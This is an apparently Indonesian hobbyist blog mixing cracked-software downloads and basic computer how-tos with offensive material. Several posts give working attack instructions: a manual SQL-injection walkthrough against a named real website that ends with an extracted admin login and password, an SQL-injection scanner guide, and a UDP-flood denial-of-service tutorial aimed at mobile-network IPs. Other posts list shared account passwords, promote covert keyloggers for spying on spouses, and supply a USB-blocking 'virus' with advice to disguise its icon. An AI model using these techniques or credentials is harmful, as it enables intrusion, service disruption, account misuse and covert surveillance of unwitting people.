This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

music

visitors

free counters
Tampilkan postingan dengan label computer. Tampilkan semua postingan
Tampilkan postingan dengan label computer. Tampilkan semua postingan

Rabu, 22 Mei 2013

Free Download SamDrivers v13.3.2 - Full Edition 2013

Free Download SamDrivers v13.3.2 - Full Edition 2013

SamDrivers 13.3.2 - Full Edition (x64/?…86)SamDrivers v13.3.2 - Full Edition 2013 (x64/x86) | 5.8 GB
 Free Download SamDrivers v13.3.2 - Full Edition 2013
Collection of drivers from SamLab for all 32-bit and 64-bit Windows operating systems from Windows 2000 to Windows 8, including serverplatforms. As the shell-installer to auto-detect your hardware and automatically install the necessary drivers to use special programs:DriverPack Solution Plus 13.0 Revision 317 / Drivers Installer
Assistant 3.12.12 (use version 4.0) / DriverX 3.05 (use version 1.88 and 2.2) The collection includes the most current drivers on the release date collected personally SamLab. Do not confuse this package with the driver-packs Bashrat - these drivers are newer and more stable.
SamLab long been a member of the team Bashrat has the ability to know about all the problems of the other driver packages to create its own set of the most comprehensive and peaceful!

Drivers for touchpads and other input devices of the driver packs DP_Touchpad_HHH installed only under the personal supervision and only envelope DPS
All of these devices have the same ID - controls what put us on the touchpad and the name of the pack on the notebook vendor in the name of the folder with the drivers
Still same identifiers found in drivers for sound cards and tuners - install just the drivers what firm your device

~ Included in the collection of driver packs:
DP_Biometric_13032.7z
DP_Bluetooth_13032.7z
DP_CardReader_13032.7z
DP_Chipset_13032.7z
DP_LAN_13032.7z
DP_MassStorage_13032.7z
DP_Misc_13032.7z
DP_Modem_13032.7z
DP_Monitor_13032.7z
DP_Notebook_13032.7z
DP_Printer_13003.7z
DP_Sound_ADI_13032.7z
DP_Sound_CMedia_13032.7z
DP_Sound_Conexant_13031.7z
DP_Sound_Creative_13032.7z
DP_Sound_IDT_13032.7z
DP_Sound_Others_13032.7z
DP_Sound_VIA_13014.7z
DP_Sounds_HDMI_13032.7z
DP_Sounds_Realtek_13022.7z
DP_Telephone_13025.7z
DP_Touchpad_Alps_13025.7z
DP_Touchpad_Elan_13032.7z
DP_Touchpad_Others_13013.7z
DP_Touchpad_Synaptics_13032.7z
DP_TV_Aver_13024.7z
DP_TV_Beholder_13014.7z
DP_TV_DVB_13021.7z
DP_TV_Others_13012.7z
DP_Video_AMD_Desktop_13032.7z
DP_Video_AMD_Notebook_13023.7z
DP_Video_AMD_Server_13032.7z
DP_Video_Hybrid_13012.7z
DP_Video_Intel_13032.7z
DP_Video_MacBook_13015.7z
DP_Video_nVIDIA_Desktop_13031.7z
DP_Video_nVIDIA_Notebook_13031.7z
DP_Video_nVIDIA_Server_13032.7z
DP_Video_Others_13032.7z
DP_WebCam_13032.7z
DP_WLAN_13032.7z
DP_xUSB_13032.7z

To write an assembly to a regular DVD-ROM, open the ISO-image in UltraISO program and delete the folder Drivers following files:
Printer, Video_AMD_Server, Video_nVIDIA_Server, Video_Hybrid, Touchpad_Alps, Touchpad_Elan, Touchpad_Synaptics, Touchpad_Others
or you can choose on your own to remove any other driver packs that you personally do not need further work

System requirements:
The presence of a couple of gigabytes of free space on the system hard disk to extract the temporary files
Download Premium Only
SamDrivers.13.3.2.Full.part1.rar - 900.0 MB
SamDrivers.13.3.2.Full.part2.rar - 900.0 MB
SamDrivers.13.3.2.Full.part3.rar - 900.0 MB
SamDrivers.13.3.2.Full.part4.rar - 900.0 MB
SamDrivers.13.3.2.Full.part5.rar - 900.0 MB
SamDrivers.13.3.2.Full.part6.rar - 900.0 MB
SamDrivers.13.3.2.Full.part7.rar - 641.3 MB

Download Raise Data Recovery for FAT v5.­7 Full version, Cracked, Crack, Serial keys, Activator, Path

Download Raise Data Recovery for FAT v5.­7 Full version, Cracked, Crack, Serial keys, Activator, Path

Raise Data Recovery for FAT v5.?­7 Incl Keymaker-?­CORE Free DownloadRaise Data Recovery for FAT v5.­7 Full version,Cracked,Crack,Serial keys, Activator,path Incl Keymaker
Raise Data Recovery for FAT v5.­7 Full version,Cracked,Crack,Serial keys, Activator,path
Description: Raise Data Recovery is a group of software applications each specially designed for certain file system type as a cost-efficient data recovery solution. Raise Data Recovery for FAT can only access and recover data from FAT, FAT32 and ExFAT file systems. Recognition of other file systems is implemented for informational puposes only. FAT file system features quite good chances for recovery of deleted files unless they?Ђ™re overwritten. Powerful
tools used by Raise Data recovery for FAT increase chances to recover lost data with maximum possible data recovery result.

Screenshot
Features:-
  1. Particular specialization on FAT file system recovery
  2. Immediate data access for consistent file systems
  3. Support of disk images and virtual disks
  4. Optional RAID recovery All
  5. Comprehensive files recovery Free Time
Download Link
Raise.Data.Recovery.for.FAT-NTFS.rar -

Minggu, 04 September 2011

Free Premium Accounts

Following are the list of usernames and passwords of the premium accounts for Best downloads sites.
…!! ENJOY !!…
!!…100% Working Accounts…!!

1.) www.divxcrawler.com {download movies fastly}

Username : divx273
Password : 8342729

2.) www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}

Username : cinemanetwork20
Password : butterfly20

3.) www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}

Username : lo886Ees
Password : zAgt88er

4.) www.sharingzone.net {movies, Pc softwares, Pc Games}

Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD

5.) www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}

Username : ga20me
Password : ke01feb

6.) www.watchdirect.tv {movies, music, Pc Games, online Tv}

Username : cinemanetwork20
Password : butterfly20

7.) www.fullreleasez.com {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

8.) www.fulldownloads.us {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

9.) www.pirateaccess.com {Every thing}

Username : yourfrienddalat@gmail.com
Password : CHh5LKPI

Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt

Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb5

10.) www.warezquality.com {Every thing}

Username : ageg2020
Password : z8fsDfg3

11.) wwww.warezreleases.com {All Stuff}

Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

12.) www.fulldownloadaccess.com {All Stuff}

Username : mpuv3y
Password : umvpy3x

13.) www.alphaload.com {All Stuff}

Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS

14) www.gamedownloadnow.com {All Stuff}

Username : ga20me
Password : ke01feb

15.) www.unlimiteddownloadcenter.com {All Stuff}

Username : cu20me
Password : ke01feb

16.) www.tvadvanced.com {online Tv}

Username : mv03dl
Password : frmvdl

IDM Optimizer Untuk Memaksimalkan Kinerja IDM


Satu lagi tools kecil yang mungkin sangat berguna bagi anda pemakai Internet Download Manager. Kali ini saya akan men-share tools kecil yang dapat memaksimalkan kinerja IDM tanpa harus utak-atik registry. Dengan tools ini, yang di maksimalin adalah split connectionnya jadi 16 dan speed connectionnya jadi maksimum. Cara kerjanya adalah sebagai berikut.
  1. Program ini akan membuat file baru di direktori yang berisi IDM Optimizer.exe dengan nama IDMMax.inf yang berisi script untuk masuk ke registry, trus ngutak-atik di HKCU/software/downloadmanager untuk maksimalin kinerja IDM
  2. Di dalam registry, script tadi mengubah nilai dari Advanced Integration --> 1, ConnectionSpeed --> 999999, ConnectionType --> 11, MaxConnectionsNumber-->16
  3. Sedangkan jika Anda menemukan file IDMDef.inf, maka script itu berisi untuk mengembalikan settingan IDM ke kondisi awal
  4. Untuk mengaplikasi perubahan, maka diperlukan restart IDM
Berikut ini petunjuk cara penggunaan IDM optimizer
Caranya:
  1. IDM harus sudah terinstall di komputer Anda
  2. Setelah IDM terinstall, buka program ini
    Pilih Maximize Now! untuk mengoptimasi kinerja IDM, kemudian Restart IDM
  3. Pilih Restore Default untuk kembali ke pengaturan IDM awal
  4. Restart IDM
Download

Apa itu MD5...????


Pengertian MD5 (Message-Digest algortihm 5) adalah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit (sumber: wikipedia). Password MD5 merupakan salah satu perlindungan kepada user dalam menggunakan fasilitas internet di dunia maya, terutama yang berhubungan dengan password, karena sebuah password adalah kunci yang sangat berharga bagi kita yang sering melakukan aktifitas di dunia maya, bisa kita bayangkan apabila seorang cracker mampu menjebol database website misalnya situs pemerintah yang sifatnya sangat rahasia kemudian cracker tersebut mencari bug dari situs targetnya dengan berbagai macam metode/teknik hacking (seperti : SQL Injection, Keylogger, Social Engineering, Trojan Horse, DDOS d.l.l) supaya cracker bisa menembus ke database dan mendapatkan password korbannya dalam bentuk hash, dan kalau berhasil mencuri passwordnya dalam bentuk hash yang totalnya berjumlah 32bit (contoh hash : fdf0ef0ea5c1620f77107f3f1047fb4c) maka dengan mudah password hash hasil encrypt MD5 tersebut tinggal di decrypt ke dalam bentuk plain text (teks biasa) dengan menggunakan tools/software yang bisa didownload gratis dari paman google maupun website penyedia layanan decrypt password hash MD5 ke password yang sebenarnya, dengan demikian secara otomatis sang cracker pun dengan leluasa melakukan semua  hal yang dia inginkan seperti mencuri data, merubah data, mengganti tampilan suatu website (Deface) dan bahkan ada yang hanya mendiamkannya saja karena maksud utamanya adalah untuk mengetes security dari situs targetnya saja dan untuk memenuhi rasa penasarannya  sampai dia bisa menembus database nya dan tidak berniat untuk merusak, setelah bisa ditembus databasenya ditinggalkan begitu saja , biasanya hal tersebut dilakukan oleh seorang hacker golongan putih (WhiteHat).

Sejarah singkat MD5 di mulai pada tahun 1991 yang didesain oleh Prof. Ronald Rivest dari universitas di Amerika Serikat yaitu MIT, Prof. Ronald Rivest mendesain MD5 karena telah ditemukan kelemahan pada MD4 yang ditemukan Hans Dobbertin. Pada Tahun 1996 Hans Dobbertin menemukan sebuah kerusakan/celah pada fungsi kompresi MD5, namun hal ini bukanlah serangan terhadap hash MD5 sepenuhnya, sehingga dia mengumumkan untuk para pengguna kriptografi menganjurkan supaya mengganti dengan WHIRLPOOL, SHA-1, atau RIPEMD-160.
Namun lambat laun MD5 sudah tidak bisa diandalkan lagi karena hash hasil encrypt MD5 mulai menampakkan kerusakannya dan sudah diketahui rahasia algoritma pada MD5, hal tersebut ditemukan kerusakannya pada tanggal 17 Agustus 2004 oleh Xiaoyun Wang, Dengguo Feng, Xuejia Lay dan Hongbo Yu, kalau dilihat dari namanya mereka berasal dari negri tirai bambu China,  sekedar info saja bahwa serangan yang mereka lakukan untuk bisa men-decrypt hash MD5 ke plain text hanya membutuhkan waktu satu jam saja, dengan menggunakan IBM P690 cluster.
Kesimpulan : ” Bahwa didunia ini tidak ada Password yang aman untuk digunakan, karena semua itu masih menggunakan logika manusia untuk membuat Algoritmanya,  dan sesungguhnya Dzat yang menciptakan kita  ALLAH SWT Yang Maha Sempurna.”

Rabu, 20 Juli 2011

Know More About Secure Sockets Layer (SSL)



Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.
 

What exactly is Secure Communication ?

 
Suppose there exists two communication parties A (client) and B (server).
 
Working of HTTP
When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
 
Now lets see the working of HTTPS
When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below
 

How is HTTPS implemented ?

 
HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
  1. An SSL Certificate enables encryption of sensitive information during online transactions.
  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.
 
How Encryption Works ?
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).
 
How to identify a Secure Connection ?
In Internet Explorer, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.
I Hope this helps. Please pass your comments.

Minggu, 17 Juli 2011

How to Enable Telnet Command in Vista



Most of you are familiar with the telnet command. It is one of the well known Windows IP Utilities. In fact the telnet command is most important for sending a fake email which i have discussed in my previous post. If you are using Windows XP the telnet command is available by default.But if you use Windows Vista the telnet command is disabled by default.
So when you try to use the telnet command in Windows Vista you get the following error message.
‘telnet’ is not recognized as an internal or external command,operable program or batch file.
You get this error in Vista because unlike XP, Vista does not support telnet command by default. So, for this you have to manually enable/turn on the telnet feature in Vista.
Here’s the step by step procedure to enable telnet feature (telnet command) in Windows Vista.
1. Goto the Control Panel.
2. Click on the sub heading Uninstall a program under the main heading Programs.
NOTE: IF you are in the Classic View click on Programs and Features.
3. Now in the left panel under the Tasks select the option Turn Windows features on or off.
4. Now a new window opens. In the new window select the following
Telnet Client
Telnet Server (optional)
5. After selecting click on OK.
Now wait for few minutes till the telnet feature is installed. Once the telnet feature is installed you can goto the command prompt and use the telnet command. System restart is not required.

How to Change the ICON of an EXE file



Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself. Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie: The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.
1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).
2. Right-click on the exe file whose ICON is to be changed.
3. Now you will see the option Change Icon. Click on that option.
4. Now the Icon Changer program will open up.
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.
6. Now select the ICON of your choice and click on SET.
7. Now a popup window will appear and ask you to select from either of these two options.
  • Change embeded icon.
  • Adjust Windows to display custom icon.
Select the first option (Change embeded icon).
8. You are done. The ICON get’s changed.

How to Monitor a Remote Computer


Monitor Remote ComputerMost of the time, it becomes necessary for us to monitor our own computer or a remote computer to keep track of the activities going on. This may be for several reasons. Especially it is most necessary for the parents to monitor their computer to keep track of their children’s activities during their absence. Some people may also require to monitor their computer to keep an eye on the activities of their spouse or partner.
Today, with the advancement in the field of software technology, it is possible to easily monitor any given computer. For this all you have to do is, use a PC Monitoring Software.
But the job doesn’t end here. This is because, there exists tons of such monitoring softwares on the market and many times people often get confused which one to choose and how to use them. So I have decided to make this job simpler for you, by writing this post. In this post I’ll give a detailed information about computer monitoring softwares which include their features, advantages, installation, usage procedure and so on. To make this post interesting, let’s take up each topic in the form of a question and answer.
 
What exactly is a Monitoring Software and how can it help me?
A computer monitoring software is just like any other software (program) which when installed, secretly monitors each and every activity that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as Keyloggers.
 
How can I install a monitoring software?
Installing a monitoring software is too simple. During the installation, you need to setup a secret password and hotkey combination which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible, but keeps running in the background. Whenever you want to see the logs, just press the hotkey combination (ex. Shift+Ctrl+F10). Now a small window will popup asking for a password. Here you need to enter the password that was setup during the installation time. After you enter the password you’ll be able to see all the activities that took place on the computer during your absence.
 
Can the person using the computer come to know about the presence of the Monitoring Software?
Most of the time it becomes impossible to detect the presence of the monitoring software. This is because, once installed it hides itself from Start menu, Program Files, Control Panel, Task manager etc. Because of it’s stealth behaviour the user can never come to know that he/she is under the presence of monitoring.
 
Which Monitoring Software should I use?
There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.
 

For Monitoring a Local PC:

 
If you want to monitor a local PC (may be your own PC) then the following program is recommended.
You can find a Complete Installation Guide for Spy Agent Stealth HERE
 

For Monitoring a Remote PC (Also works on local PC):

 
If you want to monitor a remote PC  you may use the following programs. These programs works for remote PC as well as local PC.
SniperSpy
 

For Monitoring a Network:

 
The following program can be used to monitor an Entire Network of computers from one central location. This becomes handy to monitor the staff in a company or students in a school/college.
NetVizor
You can find a Complete Installation Guide for NetVizor HERE
 

For monitoring a Cell Phone from your PC:

 
If you want to monitor a Cell Phone from your PC you can refer the following link:
Cell Phone Spy
I hope this helps. Pass your comments.

A Virus Program to Disable USB Ports


Virus to disable USB portsIn this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).
I hope you like this post. Please pass your comments.

Scaner Web 4 Fun




kali ini sya akan share tentang Tools dalam dunia hacking Website,,,cieee,,,illeeeee,,,,
Sobat semua, ini adalah tools untuk scan website apakah vuln ato tidak ??
soo,,,,,langung aja ane kasih tutor bwt semua tanpa pake lama dechhh,,,,,,,
masukkin url target.. misalnya http://www.target.com di sql injector
trus liat debugging window biar tau si program kerjanya ngapain
(menu settings -> show debug window, ato pencet ctrl+w)
bis itu pencet si tombol go
tunggu....
tunggu...
tunggu...
sampe ntar nongol url yg ada tanda seru dibelakangnya -> [!]
misal
code : http://www.target.com/ind/Read/?type=ixReg&id=590&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htm [!]
nah brarti itu 90% vuln
kamu boleh stop sekarang ato biarin si program nyari sqli bugs yg lain

klo udah stop.
skarang kmu masukkin yg url ada tanda serunya tadi,
jadi yg http://target.com tadi kamu ganti jadi
code : http://www.target.com/ind/Read/?type=ixReg&id=590&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htmtrus pencet go,

biarin dia nyari...
tunggu..
code : [ sqli bugs found ! ]
mssql : Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86)
Mar 3 2007 18:40:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.target.com/ind/Read/?type=ixReg&id=590'/**/AND/**/__TIME__=convert(int,__CODE__)--'&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htm
nah itu dia POC nya nongol sekalian.
yg __TIME__ itu kamu rubah jadi angka berapa aja,
yg __CODE__ itu tempat kodenya (select bla bla from bla bla)

klo nanti ternyata target vuln, tpi gak nongol db, table ato lain2,
kmu coba stop,restart, kasih url yg tanda seru tadi,
contreng di checkbox blind injection, klik go lagi
mungkin si target = blind sqli
udah versi 0.7
Link download :
http://tools.kerinci.net/download/kerinci-0.7.zip
di versi ini kmu tinggal klik aja

Manual SQL Injection


   


Target : http://www.natoleo.com/Content.php?id=14
1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com
muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)

2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')
http://www.natoleo.com/Content.php?id=14 order by 5--
jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)

3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14
http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--
akan muncul "angka ajaib" : 1

4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.
http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--
muncul tulisan :5.0.51a-community

5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--
muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome

6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--
muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id
kita ambil : member_login,member_password

7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL
ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--
hasilnya akan muncul:
user: wilmarnatoleo
pass: natoleoP@ssword
sekarang tinggal login ke website target..

Sabtu, 16 Juli 2011

How to Write-Protect Your USB Flash Drive


How to Write-Protect USB Flash Drive

USB Write ProtectMany a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.
This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
 3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.
4. Now right-click on  StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.
Write-Protect USB Drive





5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.
USB-Write Protect Error







To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.
Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button. You can download this tool from the following link:

DDOS/DOS Kompi tanpa pake php shell


1. download dan instal strawberry perl ,trus ketik di google :strawberry perl
    bisa di download di sini programnya : http://strawberryperl.com/
    Download Strawberry Perl 5.12.2.0
    XP/2003/Vista/2008/Win7, English, 39MB, November 2010 (release notes)

2. setelah di download dan di instal....,kita download angry ip scanner ,
    http://download.cnet.com/Angry-IP-Scanner/3000-2085_4-10045978.html
    terus jalankan ip scanner dan lu scan ip telkomsel yang masih hidup.kenapa
    gua rekomendasikan telkomsel. karena ini target gampang buat di dos,lum ada firewalnya..         
 kemungkinan besar target adalah modem usb telkomsel flash,aku juga lum paham, karena lum nyoba konek ke internet pakai ip telkomsel. ane dapat ip telkomsel itu dari mirc jakarta dal.net

3.kita cari di google script buat nge dosnya pakai udpflood
   lu lu pada bisa ketik di google dgn kyword: udpflood.pl atau udp.pl
   atau ke sini : http://rc.vc/files/perl/udpflood.pl
   setelah itu kita save ke notepad udp.pl bisa juga udp.txt bisa juga. mempan juga buat nge dos...
  dan kita masukin ke komputer kita di : C:\WINDOWS\system32

4. kita klik cmd di : C:\WINDOWS\system32 . cmd adanya di sitem 32 komp windows os''

5.kita ping dulu targetnya.. biar kita bisa tau targetnya down apa nggak,time out apa nggak nya.. biar kita tau..
   contoh: ping 182.2.1.5 -t
6.jalankan exploit upd.pl tadi di cmd.
   dengan perintah
   ==========================
   perl udp.pl ip port time
   contoh: ping
   perl udp.pl 182.2.1.5 80 999999999999999999999999999999999999999
   ==============
   di mana :

   perl udp.pl : exploit dos

   182.2.1.5 : ip adress telkomsel

   80 : port target yang mau kita dos

   99999999999999999999999999999999999999: paket data yang kita kirim

   ========================

  dan kita tinggal tunggu tuh ip adress yang kita ping. time out dah pass kita habis jalankan coommand itu...

  =============

  yang ane coba sih dari warnet speedy. ngehajar ip telkomsel flash....

  ==============

  oke. mungkin segitu aja dulu... thank buat semuanya :) ,barangkali ada yang mau nambahin, silahkan..

Rabu, 13 Oktober 2010

Cara Menginstal Ulang Komputer

Cara Menginstal Ulang Komputer


Dalam ilmu tentang komputer, salah satu hal yang penting untuk dimengerti adalah cara menginstal ulang komputer atau sistem operasinya.
Hal itulah yang menjadi langkah awal seseorang yang ingin menguasai komputer.
Disini saya jabarkan secara singkatnya saja, bagaimana cara menginstal windows XP pada komputer karena posting ini adalah posting sementara.

Langkah-langkahnya :

  1. Pastikan data-data penting yang tidak ingin dihapus dikomputer anda (harddisk) telah diamankan atau dipindahkan pada partisi yang lainnya (apabila sistem di C, maka simpanlah data penting pada drive yg lain misal : D,E,F dll).
  2. Restart Komputer, lalu tekan tombol DEL pada saat komputer hidup kembali.
  3. Sekarang anda masuk di Bagian BIOS (basic input output system). cari menu yang mengelola booting ( seperti Boot Configuration atau semacamnya).
  4. Rubah urutan booting hingga CD/DVD Room yang berposisi pada "First Boot".
  5. Tekan F10 lalu ketik Y, pada saat diminta untuk memastikan saving.
  6. Biarkan Komputer anda merestart kembali.
  7. Tekan tombol apa saja pada saat muncul tulisan "Press any key to booting from CD"
  8. Setelah itu akan muncul layar biru, klik partisi system yang akan di install (umumnya C://) tekan D untuk delete isi partisi.
  9. Lalu tekan L sesuai petunjuk pada bagian bawah halaman.
  10. Lalu tekan enter untuk mulai menginstall.
  11. Apabila kemudian muncul pesan Persetujuan tekan F8 untuk setuju(i agree).
